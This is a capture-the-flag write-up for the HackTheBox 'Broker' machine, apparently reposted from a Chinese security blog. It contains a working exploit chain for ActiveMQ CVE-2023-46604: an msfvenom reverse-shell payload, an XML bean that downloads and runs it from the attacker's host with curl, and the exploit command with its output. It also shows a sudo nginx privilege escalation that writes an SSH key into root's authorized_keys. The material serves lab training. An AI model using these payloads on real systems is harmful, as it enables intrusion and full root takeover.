-
ActiveMQ RCE CVE-2023-46604
-
Nginx malicious configuration file
Nmap
ActiveMQ
admin / admin
Do some vuln recon,find https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
https://github.com/X1r0z/ActiveMQ-RCE
Foothold
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT 6666 -f elf -o test.elfEdit the poc-linux.xml12 <beans xmlns="http://www.springframework.org/schema/beans"3 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"4 xsi:schemaLocation="5 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">6 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">7 <constructor-arg >8 <list>9 <value>sh</value>10 <value>-c</value>11 <value>curl -s -o test.elf http://10.10.14.6:8888/test.elf; chmod +x ./test.elf; ./test.elf</value>12 <!-- <value>bash</value>13 <value>-c</value>14 <value>touch /tmp/success</value> -->15 </list>16 </constructor-arg>17 </bean>18 </beans>
go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.14.6:8888/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ ___| |_(_)_ _____| / |/ _ | _ / ___| ____|
/ _ / __| __| / / _ |/| | | | |_____| |_) | | | _|
/ ___ (__| |_| | V / __/ | | | |_| |_____| _ <| |___| |___
/_/ ____|__|_| _/ ___|_| |_|___ |_| _\____|_____|
[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.14.6:8888/poc.xml
[*] Sending packet: 000000711f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001e687474703a2f2f31302e31302e31342e363a383838382f706f632e786d6
in /homewe find uset.xt
Privilege Escalation
sudo -l
sudo -lMatching Defaults entries for activemq on broker:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,use_ptyUser activemq may run the following commands on broker:(ALL : ALL) NOPASSWD: /usr/sbin/nginx
use the ngx_http_dav_moudle to wirte public SSH key into the root use's authorized_keys
https://github.com/advisories/GHSA-w7p3-hmmp-qmx6
create the malicious nginx configuration file
user root;worker_processes 4;pid /tmp/nginx.pid;events {worker_connections 768;}http {server{listen 1337;root /;autoindex on;dav_methods PUT;}}
sudo nginx -c /tmp/pwn.conf-
use root; worker processed will be run by
root. -
root /; The document root will be topmost directory of the filesystem.
-
dav_methods PUT;Enable the
WebDAVHTTP extension with thePUTmethod,so that we can upload files to the sever.
use ssto check the open ports.
Then,writing our public SSH to /root/.ssh/authorized_keys
The use curl to send the PUT (-X) request that will write the file.
curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat root.pub)"ssh -i root root@localhost
原文始发于微信公众号(红蓝安全):HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论